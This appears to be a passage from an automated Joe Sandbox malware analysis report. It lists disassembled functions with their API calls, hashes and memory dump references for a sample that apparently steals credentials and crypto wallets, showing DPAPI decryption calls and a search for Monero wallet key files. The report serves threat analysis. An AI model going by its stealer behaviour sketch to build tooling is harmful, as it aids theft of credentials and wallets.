                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID:
                        • API String ID: 377395780-0
                        • Opcode ID: 71d702c7a69ef99fc09994f886efefb7339fa31c1e01233cad3a235d7aaf6062
                        • Instruction ID: d9b8dbbb68e5900abf281cd8e3257b22c5399413321765642d05b0198a6d4a11
                        • Opcode Fuzzy Hash: 71d702c7a69ef99fc09994f886efefb7339fa31c1e01233cad3a235d7aaf6062
                        • Instruction Fuzzy Hash: C3117CB2944118ABDB18DFC9E944BBEB7F8FB4CB12F00411AF616A2284D3385980C7B0
                        Function 00F17A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,008AEA98,00000000,?,00F20E10,00000000,?,00000000,00000000), ref: 00F17A63
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F17A6A
                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,008AEA98,00000000,?,00F20E10,00000000,?,00000000,00000000,?), ref: 00F17A7D
                        • wsprintfA.USER32 ref: 00F17AB7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID:
                        • API String ID: 3317088062-0
                        • Opcode ID: db804bd6eb1ed4e4a7d75e657aec95771a4c001dbed4cb61baef0e27f2333edc
                        • Instruction ID: 3f276c77b2831b62e8c33b6474fea6271bdb10dfe121cfb301e22bbc13840f72
                        • Opcode Fuzzy Hash: db804bd6eb1ed4e4a7d75e657aec95771a4c001dbed4cb61baef0e27f2333edc
                        • Instruction Fuzzy Hash: FD1182B1945228DBEB24DB54DC45F99B778FB44721F1043A5E51A932C0C7745A80DF51
                        Function 012C9C1C Relevance: 5.3, Strings: 3, Instructions: 1563COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 7ZA$!u$S:{
                        • API String ID: 0-260234434
                        • Opcode ID: f4854feb95417d41d077ee4da97a54914d403544b0f7657f51615388c36d67d3
                        • Instruction ID: ce01bd26eb21a1e5c6b31c9f3af83067d3a7ab732768c43d5a7ed4dcb3bce2a9
                        • Opcode Fuzzy Hash: f4854feb95417d41d077ee4da97a54914d403544b0f7657f51615388c36d67d3
                        • Instruction Fuzzy Hash: E2B2E5F3A0C2049FE304AE29DC8567AFBE5EF94720F1A493DE6C5C3744EA3598058697
                        Function 00F13720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                        Download Yara Rule
                        APIs
                        • CoCreateInstance.COMBASE(00F1E118,00000000,00000001,00F1E108,00000000), ref: 00F13758
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00F137B0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWide
                        • String ID:
                        • API String ID: 123533781-0
                        • Opcode ID: af75902474b998e726421b0fbd3b6680261cbd085595fbecd0e764b79dc8893d
                        • Instruction ID: d76c4b8b0b3c9eaecc5c18277516d64b235dc12fc7e7fedf37d22049bde3882e
                        • Opcode Fuzzy Hash: af75902474b998e726421b0fbd3b6680261cbd085595fbecd0e764b79dc8893d
                        • Instruction Fuzzy Hash: 4E410671A40A28AFDB24DB58CC94BDBB7B4BB48702F4041D8E609A72D0E771AEC5CF50
                        Function 00F09B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00F09B84
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00F09BA3
                        • LocalFree.KERNEL32(?), ref: 00F09BD3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotect
                        • String ID:
                        • API String ID: 2068576380-0
                        • Opcode ID: 203d264517af044a038ee6cff18877e4d55a1367f0a298b66193644ee7926d63
                        • Instruction ID: 7849885e10ff62bc1ba7675976dad0802db927bd2c1b501b50ad91d7651c8ca0
                        • Opcode Fuzzy Hash: 203d264517af044a038ee6cff18877e4d55a1367f0a298b66193644ee7926d63
                        • Instruction Fuzzy Hash: C8110CB8A00209EFDB04DF94D985AAE77B5FF88700F104568E81597384D774AE50CF61
                        Function 012CB6B4 Relevance: 4.2, Strings: 2, Instructions: 1668COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: iakm$@/_
                        • API String ID: 0-3554580638
                        • Opcode ID: 9ced6500eb433c0876decb07a35e8af1a9f08e4f7c715e6a27b5778b83f7f8dc
                        • Instruction ID: 0bdd2dc27dfb6b134f48f134537dcc06c0f10b01b89cbfa7ba3e4e9de0990eaf
                        • Opcode Fuzzy Hash: 9ced6500eb433c0876decb07a35e8af1a9f08e4f7c715e6a27b5778b83f7f8dc
                        • Instruction Fuzzy Hash: DEB22BF3A0C2049FE3046E2DEC8577ABBE9EBD4320F1A493DEAC5C7744E63558058696
                        Function 00F0F68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F215B8,00F20D96), ref: 00F0F71E
                        • StrCmpCA.SHLWAPI(?,00F215BC), ref: 00F0F76F
                        • StrCmpCA.SHLWAPI(?,00F215C0), ref: 00F0F785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00F0FAB1
                        • FindClose.KERNEL32(000000FF), ref: 00F0FAC3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: c19a005c7c07037de24dbfc9fa304fcb766ce1a542c07603fee7310fcc33b9d6
                        • Instruction ID: bcabebe41a976f7511cb76cc7e5b815def640e0da7eae577e478326431474899
                        • Opcode Fuzzy Hash: c19a005c7c07037de24dbfc9fa304fcb766ce1a542c07603fee7310fcc33b9d6
                        • Instruction Fuzzy Hash: 3D11963580115D9BDB24FBB0ED559ED7378AF10320F4042A9A51A574D2EF382B8AEB92
                        Function 0123DAE4 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: C85
                        • API String ID: 0-414140983
                        • Opcode ID: a00c9b5b53c9fcef6794fe7472e5cc5372b1d546ae2382c8cb80cc595a030f09
                        • Instruction ID: fcb4ebd9dad46397303ac9f1189e9d724fbd8a05fb3e9cf11276960f03b96a04
                        • Opcode Fuzzy Hash: a00c9b5b53c9fcef6794fe7472e5cc5372b1d546ae2382c8cb80cc595a030f09
                        • Instruction Fuzzy Hash: 305107F3E192109FF3046E39DC8476AB7E6EB94320F2B4A3DD9C897780E57948458782
                        Function 0129C4BA Relevance: 1.4, Strings: 1, Instructions: 194COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: >9'<
                        • API String ID: 0-4020256883
                        • Opcode ID: f50c3dcde1ce2e9aa221eebdbcafa234a48d5785b82232e777bcb4082446d06d
                        • Instruction ID: c12524154840efbd749d0fc4b155de552c9631e5d2c7b39537a11a0e4f6a9190
                        • Opcode Fuzzy Hash: f50c3dcde1ce2e9aa221eebdbcafa234a48d5785b82232e777bcb4082446d06d
                        • Instruction Fuzzy Hash: 7351F3B39097189FE3046F19DC8177ABBE5EF54320F16493EE6C987380EA355851CB86
                        Function 0118DE78 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: kD?~
                        • API String ID: 0-1435761669
                        • Opcode ID: dbdab817e47fe2076be42835a31b27f367e40341edb87d2d02ada058d792aaa9
                        • Instruction ID: 4def62d3f5a94278bd2faa33dc52b2b89b00fa42ca7fe69654524318f6e03e97
                        • Opcode Fuzzy Hash: dbdab817e47fe2076be42835a31b27f367e40341edb87d2d02ada058d792aaa9
                        • Instruction Fuzzy Hash: 8251F2B3A083149FE3046E29EC8477AF7E5EB90710F1A493DD9C997780DA395C458B86
                        Function 013BB192 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: +."Q
                        • API String ID: 0-3749362571
                        • Opcode ID: b510368a1c274d0378df4688fc5e664070b75281f5660bbb491477bf278022b8
                        • Instruction ID: abed2fe82ca743c2fa6da068aa8e6ef926213545e514c4369ab21ed987cbffc6
                        • Opcode Fuzzy Hash: b510368a1c274d0378df4688fc5e664070b75281f5660bbb491477bf278022b8
                        • Instruction Fuzzy Hash: 1541D4B660D708CBD308AE29D89547EF7E9EF94714F06493EE6C687E44FE3058418A43
                        Function 01362A9E Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
